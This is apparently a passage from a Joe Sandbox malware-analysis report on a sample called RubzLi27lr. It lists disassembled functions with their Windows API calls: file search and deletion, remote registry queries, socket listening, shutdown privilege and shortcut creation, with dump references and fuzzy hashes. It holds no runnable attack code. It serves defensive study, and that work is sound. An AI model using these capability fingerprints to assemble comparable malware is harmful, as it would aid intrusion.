                                                                                                                  Function 00B29642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B29663
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00B296A1
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00B296BB
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B296D3
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B296DE
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B296FA
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B2974A
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00B76B7C), ref: 00B29768
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B29772
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B2977F
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B2978F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1409584000-438819550
                                                                                                                  • Opcode ID: 457b5a4328516c7cb16e07dd7cf78564a5fac54063c427714faa38b862ed361c
                                                                                                                  • Instruction ID: d8b8a14cd5f7200f26a6a2b5d366da21ee3c676c7020d934f818302b741ac5d8
                                                                                                                  • Opcode Fuzzy Hash: 457b5a4328516c7cb16e07dd7cf78564a5fac54063c427714faa38b862ed361c
                                                                                                                  • Instruction Fuzzy Hash: 2231F3365016296BDB14AFB4EC49ADE3BECEF0A720F104196F91DE31A0DB70DE448A14
                                                                                                                  Function 00B2979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B297BE
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B29819
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B29824
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B29840
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B29890
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00B76B7C), ref: 00B298AE
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B298B8
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B298C5
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B298D5
                                                                                                                    • Part of subcall function 00B1DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B1DB00
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                  • Opcode ID: 3845af7bbdf966603016160dd0e1acf2c7b2adf62bae26b2f20bacb0ba8fdf25
                                                                                                                  • Instruction ID: ec0ef97ae83ad72b5a0d1bf3ae7b0e75f8bc80721238c9d09e37a71d43939b23
                                                                                                                  • Opcode Fuzzy Hash: 3845af7bbdf966603016160dd0e1acf2c7b2adf62bae26b2f20bacb0ba8fdf25
                                                                                                                  • Instruction Fuzzy Hash: CA3103315016296ADB14EFB4EC48ADE37ECEF06760F1841E6E81CE71E0DB70DE448A24
                                                                                                                  Function 00B3BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3BF3E
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B3BFA9
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3BFCD
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B3C02C
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B3C0E7
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B3C154
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B3C1E9
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00B3C23A
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B3C2E3
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B3C382
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3C38F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3102970594-0
                                                                                                                  • Opcode ID: ef6ba26be2570d085bb50b958f013c218893cfa71296bacc348ec02d615a1120
                                                                                                                  • Instruction ID: 42fa5f993d1facab51000f7732299b40afa4ce380925fbf56066be4e22a7d115
                                                                                                                  • Opcode Fuzzy Hash: ef6ba26be2570d085bb50b958f013c218893cfa71296bacc348ec02d615a1120
                                                                                                                  • Instruction Fuzzy Hash: E9025E716042009FC714DF68C891E2ABBE5EF89314F28C49DF84ADB2A2DB31ED45CB52
                                                                                                                  Function 00B28195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00B28257
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B28267
                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B28273
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B28310
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28324
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28356
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B2838C
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28395
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1464919966-438819550
                                                                                                                  • Opcode ID: 92955e99f79e9deb1e430cd8b32e093d40050c9b8b8bd8cca44905db17ed5d2a
                                                                                                                  • Instruction ID: 95b67fcc26fc11ad82c89e1b590e6d26b2d15c5408c740ff8afecae1da555888
                                                                                                                  • Opcode Fuzzy Hash: 92955e99f79e9deb1e430cd8b32e093d40050c9b8b8bd8cca44905db17ed5d2a
                                                                                                                  • Instruction Fuzzy Hash: 4E616B725043559FCB10EF60D8809AEB3ECFF89710F04896EF99A97251EB31E945CB92
                                                                                                                  Function 00B1D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                    • Part of subcall function 00B1E199: GetFileAttributesW.KERNEL32(?,00B1CF95), ref: 00B1E19A
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B1D122
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B1D1DD
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00B1D1F0
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B1D20D
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B1D237
                                                                                                                    • Part of subcall function 00B1D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B1D21C,?,?), ref: 00B1D2B2
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00B1D253
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B1D264
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1946585618-1173974218
                                                                                                                  • Opcode ID: c286479eb5969382b28a50d0cc92ec46f18b133ca4ae37b703b0d2b0a21a3eab
                                                                                                                  • Instruction ID: 5c6ca75dcec96c8a356a3ef114b25828f5b74fc4f74146e870bfbd366f320b14
                                                                                                                  • Opcode Fuzzy Hash: c286479eb5969382b28a50d0cc92ec46f18b133ca4ae37b703b0d2b0a21a3eab
                                                                                                                  • Instruction Fuzzy Hash: 5E615E3180110DAFCF05EBE0DA929EEBBB9AF15300F6441A9E41577192EB31AF49DB61
                                                                                                                  Function 00B2ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1737998785-0
                                                                                                                  • Opcode ID: 273acb1cd91856745e1cd497faae389c63a5dd0fc05ed7a967320b4f6a065562
                                                                                                                  • Instruction ID: 4aaa4ef1ccee2ae6d32795d3f816f3e068c0969a2c470d672912318212dec13f
                                                                                                                  • Opcode Fuzzy Hash: 273acb1cd91856745e1cd497faae389c63a5dd0fc05ed7a967320b4f6a065562
                                                                                                                  • Instruction Fuzzy Hash: 7141D035205621AFD320DF16E888F69BBE5FF45328F15C099E4298B762CB71ED42CB90
                                                                                                                  Function 00B1E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
                                                                                                                    • Part of subcall function 00B116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
                                                                                                                    • Part of subcall function 00B116C3: GetLastError.KERNEL32 ref: 00B1174A
                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00B1E932
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                                                                  • API String ID: 2234035333-3163812486
                                                                                                                  • Opcode ID: 67529d0278279fad1e3c653f25478fed4e0eeb8c98e28e63c22a86247da39aae
                                                                                                                  • Instruction ID: d93d2e818bf90a6afe9ad7bc78d30cf2a54ce2b4775ee6be9ed0cfeaca083b83
                                                                                                                  • Opcode Fuzzy Hash: 67529d0278279fad1e3c653f25478fed4e0eeb8c98e28e63c22a86247da39aae
                                                                                                                  • Instruction Fuzzy Hash: 40012B32610311ABEB5426749C8ABFF72DCEB18780F5448A2FD23E31D1DAB59DC081A4
                                                                                                                  Function 00B31204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B31276
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31283
                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00B312BA
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B312C5
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B312F4
                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00B31303
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B3130D
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B3133C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 540024437-0
                                                                                                                  • Opcode ID: 9c561f67375a1e24c6fc76d9e228da72de3269a21a8be678c9cc28f9c36f18ab
                                                                                                                  • Instruction ID: 89b5417981b660b512fdc06d6485292537788afbe56e111f2188c630c4a14986
                                                                                                                  • Opcode Fuzzy Hash: 9c561f67375a1e24c6fc76d9e228da72de3269a21a8be678c9cc28f9c36f18ab
                                                                                                                  • Instruction Fuzzy Hash: 3F4182356001009FD710DF28C984B6ABBE9FF46714F2885C8E8569F296C771ED81CBA1
                                                                                                                  Function 00AEB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AEB9D4
                                                                                                                  • _free.LIBCMT ref: 00AEB9F8
                                                                                                                  • _free.LIBCMT ref: 00AEBB7F
                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B53700), ref: 00AEBB91
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B8121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00AEBC09
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B81270,000000FF,?,0000003F,00000000,?), ref: 00AEBC36
                                                                                                                  • _free.LIBCMT ref: 00AEBD4B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314583886-0
                                                                                                                  • Opcode ID: 266ff78caa37ac314450bcb95fc3aaab013773adc3851ec62800f49a38952aee
                                                                                                                  • Instruction ID: 65f66854441d24106d1f6ad63d9a5ef2b8f9715e5077a4d1976e9b13f48fccc1
                                                                                                                  • Opcode Fuzzy Hash: 266ff78caa37ac314450bcb95fc3aaab013773adc3851ec62800f49a38952aee
                                                                                                                  • Instruction Fuzzy Hash: 7EC14A719142859FCB20DF7A8D49BAB7BBCEF45350F1441AAE494DB262EB309E41C770
                                                                                                                  Function 00B1D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                    • Part of subcall function 00B1E199: GetFileAttributesW.KERNEL32(?,00B1CF95), ref: 00B1E19A
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B1D420
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B1D470
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B1D481
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B1D498
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B1D4A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2649000838-1173974218
                                                                                                                  • Opcode ID: 82b836ff5e09818be373fcc428358500daa7d04f3a5ee162c740910f4a8e7543
                                                                                                                  • Instruction ID: 6f91aa80584e50e5382e20a318a68283141bba032b476f2b5a4768718d448db3
                                                                                                                  • Opcode Fuzzy Hash: 82b836ff5e09818be373fcc428358500daa7d04f3a5ee162c740910f4a8e7543
                                                                                                                  • Instruction Fuzzy Hash: 9C318031009341ABC304EF64D9919EFBBECBE96300F844A5DF4D593292EB70AA49D763
                                                                                                                  Function 00AEE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __floor_pentium4
                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                  • Opcode ID: 30319e50bb5206eafdc7775e295c7493d6f4b4128a4d0de465b6acc5a1898966
                                                                                                                  • Instruction ID: 8d24adfea5de6f96f5dc3478983156d2069421c6bd4d628318861e236add4500
                                                                                                                  • Opcode Fuzzy Hash: 30319e50bb5206eafdc7775e295c7493d6f4b4128a4d0de465b6acc5a1898966
                                                                                                                  • Instruction Fuzzy Hash: ABC25B71E086698FDB25CF29DD407EAB7B5EB48305F1441EAD84EE7280E775AE818F40
                                                                                                                  Function 00B2648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B264DC
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B26639
                                                                                                                  • CoCreateInstance.OLE32(00B4FCF8,00000000,00000001,00B4FB68,?), ref: 00B26650
                                                                                                                  • CoUninitialize.OLE32 ref: 00B268D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 886957087-24824748
                                                                                                                  • Opcode ID: 794d75333101f0f4f173dee7dc91e5ba57969a1d6bab9b421f0d1f1169e4fd49
                                                                                                                  • Instruction ID: d98dee484fc54776d605a31862f2d46a9c42133b620dd1bb0655b6950a998412
                                                                                                                  • Opcode Fuzzy Hash: 794d75333101f0f4f173dee7dc91e5ba57969a1d6bab9b421f0d1f1169e4fd49
                                                                                                                  • Instruction Fuzzy Hash: 26D15971508311AFC304EF24C9819ABB7E8FF94704F10496DF5998B2A2EB71ED05CBA2
                                                                                                                  Function 00B322DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00B322E8
                                                                                                                    • Part of subcall function 00B2E4EC: GetWindowRect.USER32(?,?), ref: 00B2E504
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B32312
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B32319
